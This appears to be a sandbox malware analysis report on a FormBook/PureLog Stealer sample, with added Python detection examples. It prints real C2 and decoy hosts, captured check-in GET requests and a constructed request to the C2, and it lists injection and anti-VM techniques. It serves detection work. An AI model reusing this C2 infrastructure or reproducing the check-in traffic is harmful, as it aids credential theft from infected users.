

Windows Analysis Report
duGqHKp0OUXaX1D.exe

Overview

General Information

Sample name: duGqHKp0OUXaX1D.exe
Analysis ID: 1410995
MD5: e2eda8c49ab184de6d3b030bd499e4d1
SHA1: 2747c8421270d9630708f343b98fb2012dc38003
SHA256: d68a5d440931df383de62e3436f5f485ecd75b552e8b78065706a8c880828378
Tags: exe

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • duGqHKp0OUXaX1D.exe (PID: 7548 cmdline: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe MD5: E2EDA8C49AB184DE6D3B030BD499E4D1)
    • duGqHKp0OUXaX1D.exe (PID: 7656 cmdline: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe MD5: E2EDA8C49AB184DE6D3B030BD499E4D1)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • help.exe (PID: 7700 cmdline: C:\Windows\SysWOW64\help.exe MD5: DD40774E56D4C44B81F2DFA059285E75)
          • cmd.exe (PID: 7736 cmdline: /c del "C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
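The process tree above is the part of this report that can be turned into host-side detection without the sandbox: a loader that re-executes its own image (PID 7548 starting PID 7656, consistent with the suspended-process and process-hollowing signatures), explorer.exe appearing as a child of a Desktop executable, a SysWOW64 binary (help.exe) spawned from explorer.exe, and cmd.exe deleting the original sample. The following Python is an added example and is not part of the Joe Sandbox report or of any Joe Security tooling: it parses the tree exactly as printed above (copied in as sample input) and flags those four parent/child relationships. The rule names and the set of "expected" explorer.exe parents are the example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Process tree as printed in the report above, copied here as offline sample input
# (the "• " bullets and two-space indentation are the report's own layout).
SAMPLE_TREE = """\
• duGqHKp0OUXaX1D.exe (PID: 7548 cmdline: C:\\Users\\user\\Desktop\\duGqHKp0OUXaX1D.exe MD5: E2EDA8C49AB184DE6D3B030BD499E4D1)
  • duGqHKp0OUXaX1D.exe (PID: 7656 cmdline: C:\\Users\\user\\Desktop\\duGqHKp0OUXaX1D.exe MD5: E2EDA8C49AB184DE6D3B030BD499E4D1)
    • explorer.exe (PID: 4084 cmdline: C:\\Windows\\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • help.exe (PID: 7700 cmdline: C:\\Windows\\SysWOW64\\help.exe MD5: DD40774E56D4C44B81F2DFA059285E75)
        • cmd.exe (PID: 7736 cmdline: /c del "C:\\Users\\user\\Desktop\\duGqHKp0OUXaX1D.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7744 cmdline: C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
"""

LINE_RE = re.compile(
    r"^(?P<indent> *)(?:• )?(?P<image>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmd>.*) MD5: (?P<md5>[0-9A-Fa-f]{32})\)$"
)
DEL_RE = re.compile(r'\bdel\s+"?([^"\s]+)"?', re.IGNORECASE)

# Assumption of this example: explorer.exe normally descends from the logon chain
# or from another explorer.exe, never from a file on a user's Desktop.
EXPECTED_EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe", "explorer.exe"}


@dataclass
class Proc:
    image: str
    pid: int
    cmdline: str
    md5: str
    parent: Optional["Proc"] = None


def parse_tree(text: str) -> List[Proc]:
    """Rebuild parent links from the indentation of the printed tree."""
    procs: List[Proc] = []
    stack: List[tuple] = []  # (indent depth, Proc) of the current ancestry
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        depth = len(m["indent"])
        while stack and stack[-1][0] >= depth:
            stack.pop()
        proc = Proc(m["image"].lower(), int(m["pid"]), m["cmd"], m["md5"].lower(),
                    stack[-1][1] if stack else None)
        procs.append(proc)
        stack.append((depth, proc))
    return procs


def ancestors(proc: Proc):
    p = proc.parent
    while p is not None:
        yield p
        p = p.parent


def detect(procs: List[Proc]) -> List[tuple]:
    """Return (rule name, pid) for every relationship worth alerting on."""
    hits = []
    for p in procs:
        par = p.parent
        if par is None:
            continue
        # Same image and same hash as the parent: the sample launching a copy of
        # itself, the footprint a suspended-start-then-hollow loader leaves behind.
        if p.image == par.image and p.md5 == par.md5:
            hits.append(("self_relaunch", p.pid))
        # explorer.exe whose parent is not part of the logon chain.
        if p.image == "explorer.exe" and par.image not in EXPECTED_EXPLORER_PARENTS:
            hits.append(("explorer_unexpected_parent", p.pid))
        # A 32-bit system binary started by explorer.exe (help.exe in this report).
        if par.image == "explorer.exe" and "\\syswow64\\" in p.cmdline.lower():
            hits.append(("syswow64_child_of_explorer", p.pid))
        # cmd.exe deleting the file an ancestor process was started from.
        if p.image == "cmd.exe":
            m = DEL_RE.search(p.cmdline)
            if m:
                target = m.group(1).lower()
                if any(a.cmdline.strip('"').lower() == target for a in ancestors(p)):
                    hits.append(("self_delete_via_cmd", p.pid))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(parse_tree(SAMPLE_TREE)):
        print(f"{rule:28s} PID {pid}")
```

The report notes that no Sigma rule matched this run; the four relations above are exactly the fields a Sysmon process-creation (Event ID 1) rule keys on: Image, ParentImage and CommandLine. The "explorer_unexpected_parent" check is the noisiest of the four on real fleets (users restarting explorer from Task Manager or a shortcut), so it is best combined with one of the others rather than alerted on alone.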
{"C2 list": ["www.grupooceanique.com/ns03/"], "decoy": ["dipity.tech", "agathis.fun", "ekaterinai.store", "elizabethsbookshelf.com", "smilesustainably.com", "tapeworm.xyz", "beatricesswarthout.xyz", "nsrpackersandpackers.in", "yedxec.xyz", "gildedbeautyaesthitics.com", "hanibalbechar.com", "fichaphuman.net", "adilosk.shop", "geezaran.com", "ventasemail.com", "phonecasesdirect.store", "rctjuc.shop", "sukimossmanagement.com", "caller-id.today", "kft07.vip", "mahbubamaahi.com", "tcindustrie.net", "ng-stl.com", "vb4n53g4fh354gf5jh.top", "repair-services.today", "fonbnk.pro", "olivabelle.com", "pqeomjr.cc", "elevatedblanks.net", "ambiatec.solutions", "quantumaster.online", "pocket-option.tech", "circly.net", "focus2c.com", "armacao-de-oculos.com", "bmcj365.com", "maxhealthunity.com", "taifengtechnologyservice.com", "zerolethal.com", "dramaqu.guru", "kukrejaassociates.in", "jamesjenner.com", "signature-perfect.com", "fbaparadise.com", "yandada.us", "rcpbooks.site", "celonstore.fun", "dailynewarker.com", "594545.xyz", "chuanruhaomen.com", "planetpost.lol", "kinovod130424.pro", "lavanced.com", "leclandesparents.com", "childnchestcare.com", "taiyuanbaoyang.com", "engagenotrage.com", "halffullliving.com", "scheuermannworks.com", "oengpalworld.store", "derech-hamagah.com", "clintomator.com", "velvetgloveseasonings.store", "pkclubc.site"]}
Source | Rule | Description | Author
00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
(26 further entries not shown)
Source | Rule | Description | Author
0.2.duGqHKp0OUXaX1D.exe.4f50000.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.duGqHKp0OUXaX1D.exe.26e3fd8.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.duGqHKp0OUXaX1D.exe.4f50000.4.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(9 further entries not shown)
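The string tables above give byte sequences that can be reused directly, outside the sandbox. The following Python is an added example and is not Joe Security, Elastic, yara-signator or JPCERT/CC code: it turns the hex strings listed above into a literal byte scanner, plants them in a constructed buffer to show matching, and decodes the `68 xx xx xx xx` strings of the JPCERT/CC rule as x86 `push imm32` so the 32-bit constant each one pushes can be searched for in a disassembler. It handles only the plain hex strings shown on this page, not Yara wildcards, jumps or rule conditions; the buffer layout and the rule-name keys are the example's own.

```python
import re
import struct

# Hex strings copied from the Yara matches listed above (the report's own values).
RULE_STRINGS = {
    "Windows_Trojan_Formbook_1112e116": {
        "$a1": "3C 30 50 4F 53 54 74 09 40",
        "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    },
    "Formbook_1": {
        "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    },
    "Formbook (JPCERT/CC)": {
        "$sqlite3step": "68 34 1C 7B E1",
        "$sqlite3text": "68 38 2A 90 C5",
        "$sqlite3blob": "68 53 D8 7F 8C",
    },
}


def hex_to_bytes(hex_string: str) -> bytes:
    return bytes.fromhex(hex_string.replace(" ", ""))


def compile_rules(rules: dict) -> dict:
    """Literal byte patterns only: every hex string above is wildcard-free."""
    return {rule: {name: re.compile(re.escape(hex_to_bytes(h)))
                   for name, h in strings.items()}
            for rule, strings in rules.items()}


def scan(buf: bytes, compiled: dict) -> dict:
    """Return {rule: [(string name, offset), ...]} for every hit, ordered by offset."""
    hits = {}
    for rule, patterns in compiled.items():
        found = []
        for name, pat in patterns.items():
            found.extend((name, m.start()) for m in pat.finditer(buf))
        if found:
            hits[rule] = sorted(found, key=lambda t: t[1])
    return hits


def push_imm32(pattern: bytes):
    """x86 'push imm32' is opcode 0x68 followed by a little-endian dword."""
    if len(pattern) == 5 and pattern[0] == 0x68:
        return struct.unpack("<I", pattern[1:])[0]
    return None


def contains_rdtsc(pattern: bytes) -> bool:
    """0F 31 is the RDTSC opcode used for timing-based VM and debugger checks."""
    return b"\x0f\x31" in pattern


def build_sample_buffer() -> bytes:
    """Constructed memory image: NOP filler with rule strings planted at known offsets."""
    a1 = hex_to_bytes(RULE_STRINGS["Windows_Trojan_Formbook_1112e116"]["$a1"])
    step = hex_to_bytes(RULE_STRINGS["Formbook (JPCERT/CC)"]["$sqlite3step"])
    text = hex_to_bytes(RULE_STRINGS["Formbook (JPCERT/CC)"]["$sqlite3text"])
    seq0 = hex_to_bytes(RULE_STRINGS["Formbook_1"]["$sequence_0"])
    buf = bytearray(b"\x90" * 0x200)
    buf[0x40:0x40 + len(a1)] = a1
    buf[0x100:0x100 + len(step)] = step
    buf[0x120:0x120 + len(text)] = text
    buf[0x180:0x180 + len(seq0)] = seq0
    buf[0x1A0:0x1A0 + len(seq0)] = seq0
    return bytes(buf)


if __name__ == "__main__":
    compiled = compile_rules(RULE_STRINGS)
    for rule, found in scan(build_sample_buffer(), compiled).items():
        for name, off in found:
            raw = hex_to_bytes(RULE_STRINGS[rule][name])
            imm = push_imm32(raw)
            extra = f" push 0x{imm:08X}" if imm is not None else ""
            extra += " (rdtsc)" if contains_rdtsc(raw) else ""
            print(f"{rule:34s} {name:14s} @0x{off:04x}{extra}")
```

Offsets in the report are relative to the start of the dump, and the dump in question is the region at 0x400000, so 0x18849 for `$sqlite3step` is 0x418849 in the unpacked image. The decoded constants (0xE17B1C34, 0xC5902A38, 0x8C7FD853) are what the JPCERT/CC rule author labelled as the sqlite3_step, sqlite3_column_text and sqlite3_column_blob call sites; they are the values to search for when locating the credential-database code in a disassembler. `$sequence_0` of the yara-signator rule contains `0F 31` (rdtsc), the instruction behind the "RDTSC time measurements" signature listed above.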
                No Sigma rule has matched
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
03/18/24-14:41:50.896878 | 2031412 | 49711 | 80 | TCP | A Network Trojan was detected
03/18/24-14:42:31.107731 | 2031412 | 49713 | 80 | TCP | A Network Trojan was detected
03/18/24-14:42:51.242337 | 2031412 | 49714 | 80 | TCP | A Network Trojan was detected
03/18/24-14:43:11.686520 | 2031412 | 49715 | 80 | TCP | A Network Trojan was detected
03/18/24-14:43:52.963321 | 2031412 | 49716 | 80 | TCP | A Network Trojan was detected
03/18/24-14:44:13.611801 | 2031412 | 49717 | 80 | TCP | A Network Trojan was detected
03/18/24-14:44:34.116378 | 2031412 | 49718 | 80 | TCP | A Network Trojan was detected
03/18/24-14:45:15.449269 | 2031412 | 49719 | 80 | TCP | A Network Trojan was detected



                AV Detection

Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy list as given in the configuration above)
Source: duGqHKp0OUXaX1D.exe | ReversingLabs: Detection: 63%
Source: Yara match | File source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: duGqHKp0OUXaX1D.exe | Joe Sandbox ML: detected
Source: duGqHKp0OUXaX1D.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: duGqHKp0OUXaX1D.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP | source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000004.00000003.1433591915.000000000310C000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000003.1431937027.0000000002F23000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: duGqHKp0OUXaX1D.exe, duGqHKp0OUXaX1D.exe, 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, help.exe, help.exe, 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000004.00000003.1433591915.000000000310C000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000003.1431937027.0000000002F23000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: uSpw.pdb | source: duGqHKp0OUXaX1D.exe
Source: Binary string: help.pdbGCTL | source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1433271008.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, duGqHKp0OUXaX1D.exe, 00000002.00000002.1431926616.0000000001498000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3821169791.00000000007C0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: help.pdb | source: duGqHKp0OUXaX1D.exe, 00000002.00000002.1433271008.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, duGqHKp0OUXaX1D.exe, 00000002.00000002.1431926616.0000000001498000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000004.00000002.3821169791.00000000007C0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: uSpw.pdbSHA256 | source: duGqHKp0OUXaX1D.exe
Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 4x nop then pop edi | 2_2_0040E481
Source: C:\Windows\SysWOW64\help.exe | Code function: 4x nop then pop edi | 4_2_0293E481

                Networking

Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49711 -> 104.21.23.10:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49713 -> 172.67.146.200:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49714 -> 172.67.160.57:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49715 -> 172.67.171.253:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49716 -> 216.40.34.41:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49717 -> 192.0.78.25:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49718 -> 15.197.142.173:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49719 -> 208.91.197.27:80
Source: Malware configuration extractor | URLs: www.grupooceanique.com/ns03/
Source: DNS query | www.beatricesswarthout.xyz
Source: global traffic | HTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=KqqGrli78UDkBV4XlBvGehqbnDNs0x6MIHFba6A/A1mNeTCnsV+vzi3OAKYlREQ8vsy3 HTTP/1.1 | Host: www.agathis.fun | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=mKBnNmWovWzO3p1NH5MdZCS4ccDyJUrzrbuugVn4rxHsd/CaVzVC7EXj5wsmQQFu5Mtw HTTP/1.1 | Host: www.repair-services.today | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /ns03/?Mli=K6g4eT3z1o+VClStDjZqHdZbDfQGHeVBUJKwXzUAMY2nFTZ9zwf6CslA69neyKiZ7S0e&9rQhA=J48H HTTP/1.1 | Host: www.taiyuanbaoyang.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKAqiMqdiZl4n HTTP/1.1 | Host: www.beatricesswarthout.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=vEpXOfxtbjALuLNDB5L7Pe2+oD++ppewNBRQcYUm39B9ZRdA7FQASoNacaXdwTFFIZyq HTTP/1.1 | Host: www.velvetgloveseasonings.store | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /ns03/?Mli=Ejx28V0Mi/PKMFo4nxco0l6yr5i8wbzIhiv3vkPYYPmQLPpGZe2iDqne8+4JWli/3WeD&9rQhA=J48H HTTP/1.1 | Host: www.gildedbeautyaesthitics.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=6xy0BlydHITJ62csFR1w9NwziEOpwYF/YRUtVwNXcka1y+WP4+BwE4Gzjf3LSGjZNmwj HTTP/1.1 | Host: www.maxhealthunity.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /ns03/?9rQhA=J48H&Mli=pFpcKhsoBDMiQsDxn6RNHE8RotFPog89cmb4qNEXsJuyXSeWzOEqXN59npsx+F1JRdEB HTTP/1.1 | Host: www.scheuermannworks.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
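Every check-in captured above has the same shape: a GET to /ns03/ with one short fixed parameter (9rQhA=J48H) and one long opaque one (Mli=...), a Host header, Connection: close, no User-Agent, and a seven-byte body of NUL bytes on a GET. All eight hosts contacted are in the decoy list of the extracted configuration; the configured C2 host (www.grupooceanique.com) does not appear in the capture. The following Python is an added example, not part of the Joe Sandbox report: it parses requests rebuilt from the lines above, classifies each Host against the extracted configuration (C2 versus decoy), and scores the request shape independently of the host, so that a check-in to a host outside the known lists is still caught. The configuration excerpt, the request to the configured C2 (which the report did not observe) and the benign request are constructed for the example; the indicator names and the 40-character threshold are the example's own choices.

```python
import json
from urllib.parse import parse_qsl, urlsplit

# Excerpt of the FormBook configuration extracted in the report above; the real
# decoy list is longer, only the hosts needed here are kept.
CONFIG = json.loads("""{
  "C2 list": ["www.grupooceanique.com/ns03/"],
  "decoy": ["dipity.tech", "agathis.fun", "repair-services.today",
            "taiyuanbaoyang.com", "beatricesswarthout.xyz",
            "velvetgloveseasonings.store", "gildedbeautyaesthitics.com",
            "maxhealthunity.com", "scheuermannworks.com"]
}""")

# Sample requests. The first three are rebuilt from the "HTTP traffic detected"
# lines above (request line, Host, Connection, then the seven zero bytes shown as
# "Data Raw"). The fourth is a CONSTRUCTED check-in to the configured C2 with a
# placeholder Mli value (not observed in the report); the fifth is a constructed
# benign request for contrast.
SAMPLE_REQUESTS = [
    b"GET /ns03/?9rQhA=J48H&Mli=KqqGrli78UDkBV4XlBvGehqbnDNs0x6MIHFba6A/A1mNeTCnsV+vzi3OAKYlREQ8vsy3 HTTP/1.1\r\n"
    b"Host: www.agathis.fun\r\nConnection: close\r\n\r\n" + b"\x00" * 7,
    b"GET /ns03/?Mli=K6g4eT3z1o+VClStDjZqHdZbDfQGHeVBUJKwXzUAMY2nFTZ9zwf6CslA69neyKiZ7S0e&9rQhA=J48H HTTP/1.1\r\n"
    b"Host: www.taiyuanbaoyang.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7,
    b"GET /ns03/?9rQhA=J48H&Mli=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKAqiMqdiZl4n HTTP/1.1\r\n"
    b"Host: www.beatricesswarthout.xyz\r\nConnection: close\r\n\r\n" + b"\x00" * 7,
    b"GET /ns03/?9rQhA=J48H&Mli=" + b"ABCD" * 17 + b" HTTP/1.1\r\n"
    b"Host: www.grupooceanique.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7,
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
]


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request parser: request line, lower-cased headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def strip_www(host: str) -> str:
    host = host.lower().split(":")[0]
    return host[4:] if host.startswith("www.") else host


def classify_host(host: str, path: str, config: dict) -> str:
    """'c2' if host and path match a configured C2 URL, 'decoy' if the host is a decoy."""
    for entry in config["C2 list"]:
        c2_host, _, c2_path = entry.partition("/")
        if strip_www(host) == strip_www(c2_host) and path == "/" + c2_path:
            return "c2"
    if strip_www(host) in {strip_www(d) for d in config["decoy"]}:
        return "decoy"
    return "unrelated"


def indicators(req: dict) -> list:
    """Host-independent traits of the check-ins seen in this report."""
    found = []
    h = req["headers"]
    if "user-agent" not in h:
        found.append("no_user_agent")
    if req["method"] == "GET" and req["body"]:
        found.append("get_with_body")
    if h.get("connection", "").lower() == "close":
        found.append("connection_close")
    query = urlsplit(req["target"]).query
    if any(len(v) >= 40 for _, v in parse_qsl(query, keep_blank_values=True)):
        found.append("long_opaque_param")
    return found


def analyze(raw_requests, config: dict) -> list:
    results = []
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        path = urlsplit(req["target"]).path
        ind = indicators(req)
        role = classify_host(host, path, config)
        results.append({"host": host, "campaign_path": path, "role": role,
                        "indicators": ind,
                        "suspicious": role != "unrelated" or len(ind) >= 3})
    return results


if __name__ == "__main__":
    for r in analyze(SAMPLE_REQUESTS, CONFIG):
        print(f"{r['host']:32s} {r['role']:9s} {r['campaign_path']:8s} {r['indicators']}")
```

Blocking only the configured C2 host would have missed every connection in this capture, and the decoy domains are legitimate third-party sites (the 403 responses further down come from Cloudflare and an AWS load balancer), so they make poor block-list entries. The request shape plus the fixed campaign path is the more durable signal, which is why the host-independent indicators are scored separately from the configuration lookup.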
Source: Joe Sandbox View | IP Address: 192.0.78.25
Source: Joe Sandbox View | IP Address: 15.197.142.173
Source: Joe Sandbox View | ASN Name: AUTOMATTICUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS (listed 3 times)
Source: Joe Sandbox View | ASN Name: TANDEMUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: C:\Windows\explorer.exe | Code function: 3_2_0DF0FF82 getaddrinfo,setsockopt,recv
Source: unknown | DNS traffic detected: queries for: www.agathis.fun
